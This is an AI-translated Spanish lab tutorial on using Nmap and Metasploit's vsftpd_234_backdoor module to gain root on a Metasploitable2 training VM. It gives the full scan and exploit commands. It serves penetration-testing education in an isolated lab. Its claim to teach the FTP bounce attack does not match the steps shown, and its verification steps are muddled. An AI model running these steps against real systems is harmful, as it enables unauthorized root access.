Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit

NmapNmapBeginner
Practicar Ahora

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderás cómo explotar vulnerabilidades en el servicio de Protocolo de Transferencia de Archivos (File Transfer Protocol, FTP) para obtener acceso no autorizado a una máquina objetivo. El escenario está establecido en un contexto de ciberseguridad, donde asumirás el papel de un hacker ético encargado de identificar y explotar vulnerabilidades en un servidor FTP vulnerable.

El objetivo de este laboratorio es obtener acceso de superusuario (root) a la máquina objetivo Metasploitable2 aprovechando una vulnerabilidad del servicio FTP y utilizando el Framework Metasploit, una herramienta popular de pruebas de penetración. A través de esta experiencia práctica, adquirirás una comprensión más profunda del ataque de rebote FTP (FTP Bounce Attack), las técnicas de escaneo de puertos y el proceso de explotación utilizando Metasploit.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") subgraph Lab Skills nmap/port_scanning -.-> lab-416132{{"Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit"}} nmap/host_discovery -.-> lab-416132{{"Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit"}} nmap/target_specification -.-> lab-416132{{"Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit"}} nmap/service_detection -.-> lab-416132{{"Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit"}} end

Configurar el entorno de laboratorio

En este paso, configurarás el entorno de laboratorio, que consta de dos máquinas virtuales: la máquina Kali Linux como atacante y la máquina Metasploitable2 como objetivo.

  1. Inicia la máquina virtual Metasploitable2 ejecutando el siguiente comando en la terminal:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Verifica que la máquina Metasploitable2 esté en funcionamiento realizando un ping a ella:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor Kali Linux y accede a su shell bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Prueba la conectividad de red entre el contenedor Kali Linux y la máquina Metasploitable2:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Ahora tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puedes comenzar las pruebas de penetración.

Nota: Si sales accidentalmente del bash actual, el contenedor Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en el host para iniciar un nuevo contenedor Kali y acceder al bash para continuar con el experimento.

Realizar un escaneo de puertos

En este paso, utilizarás la herramienta de escaneo Nmap para identificar los puertos abiertos y los servicios que se ejecutan en la máquina objetivo Metasploitable2.

  1. Inicia el servicio de base de datos PostgreSQL, que es necesario para Metasploit:
service postgresql start
  1. Inicializa la base de datos de Metasploit:
msfdb init
  1. Inicia la consola del Framework Metasploit:
cd ~
msfconsole
  1. Utiliza Nmap para escanear la máquina objetivo e identificar los puertos abiertos:
nmap -sV -T4 192.168.122.102

La opción -sV habilita la detección de versiones de los puertos abiertos, y -T4 establece la política de tiempo para un escaneo más rápido.

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Explotar la vulnerabilidad del servicio FTP

En este paso, aprovecharás la vulnerabilidad identificada en el servicio FTP para obtener acceso no autorizado a la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Busca un módulo de escáner de FTP en Metasploit:
search scanner/ftp
  1. Utiliza el módulo ftp_version para escanear el servicio FTP:
use auxiliary/scanner/ftp/ftp_version
  1. Establece el host objetivo para el escaneo:
set RHOSTS 192.168.122.102
  1. Ejecuta el escaneo de la versión de FTP:
exploit
  1. Basándote en la versión de FTP identificada, busca un módulo de explotación correspondiente:
search vsFTPd
  1. Utiliza el módulo vsftpd_234_backdoor para explotar la vulnerabilidad:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Establece el host objetivo para la explotación:
set RHOST 192.168.122.102
  1. Ejecuta la explotación:
exploit

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Verificar la explotación exitosa

En este paso, verificarás que la explotación fue exitosa y que has obtenido acceso de superusuario (root) a la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Verifica el usuario actual:
whoami
  1. Verifica el nombre de host de la máquina comprometida:
hostname
  1. Verifica la dirección IP de la máquina comprometida:
ifconfig

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Resumen

En este laboratorio, aprendiste cómo explotar una vulnerabilidad en un servicio FTP para obtener acceso no autorizado a una máquina objetivo. Configuraste un entorno de laboratorio con una máquina Metasploitable2 vulnerable y una máquina de ataque Kali Linux. Realizaste un escaneo de puertos utilizando Nmap para identificar los puertos abiertos y los servicios, y luego aprovechaste el Framework Metasploit para explotar una vulnerabilidad identificada en el servicio FTP. Finalmente, verificaste la explotación exitosa comprobando el usuario actual, el nombre de host y la dirección IP de la máquina comprometida.

A través de esta experiencia práctica, adquiriste conocimientos y habilidades prácticas en la identificación y explotación de vulnerabilidades, el uso de herramientas populares de ciberseguridad como Nmap y Metasploit, y la comprensión de la técnica de ataque FTP Bounce. Estas habilidades son esenciales para los hackers éticos y los profesionales de la ciberseguridad para evaluar y fortalecer la postura de seguridad de sistemas y redes.